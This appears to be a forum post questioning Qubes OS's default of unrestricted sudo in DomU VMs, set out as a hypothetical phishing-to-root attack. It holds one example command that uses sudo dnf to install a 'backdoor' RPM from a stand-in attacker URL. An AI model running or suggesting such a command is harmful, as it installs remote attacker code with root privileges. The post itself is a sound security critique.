I'm sure this has been kicked into a pulp (considering the threads and the text 
in the sudoers files) but I am still perturbed by the argument that allowing 
unrestricted sudo to root in a DomU VM is "safe" and there is "no benefit" to 
disallowing it.  Perhaps I am misunderstanding something, I have only installed 
and begun to pull the system apart today, so bear with me.

Hypothetical (only sort of):

-Non-disposable VM used for personal email gets a phishing attack. Or maybe it's 
code embedded in that kitten wrapped in bacon jpeg.
-Phishing attack (oops) succeeds due to the user's uncontrollable nature to *click*.
-Attack actually exploits a browser bug executing code. Nothing new.
-Code modifies /usr/bin/audacious or any number of scenarios because it, for 
all intents and purposes, has root without even having to perform an exploit. All 
it has to do is sudo or su -.

This code could do something as comical as:

sudo dnf install https://i.ownz.uk/muhbackdoorz.rpm

I am having an extremely difficult time seeing how this is not an issue.

Now keep in mind I am somewhat joking above. No, I would not click on the 
phishing link but this in no way negates the example. Also I realize that this 
DomU compromise only compromises it and not the entire system pending a VM 
escape attack.

How do you deal with this potential scenario?

This part of the file system is not rewritten on every boot. Are you constantly 
somehow verifying your VM every boot, every 5 minutes, every web page load?  Or 
are you restoring from a backup every boot or worse rebuilding the entire VM 
from a template every time you need it? Do you just not care that this VM could 
be under nefarious control and let the perpetrator read your email etc?

What am I missing here that negates the above situation not being far more 
trivial to perform and dangerous due to the fact there are no locks between 
"user@domU" and its companion root account?

Anyhow, the concepts Qubes OS is employing are very cool and overall the system 
seems very well designed to be functional. Great work. But the above item very 
much has me concerned.

Side note, something like SELinux could add further benefits within both Dom0 
and DomU but that is a whole new can of worms. i.e.: policy that disallows the 
browser from ever executing code capable of this.
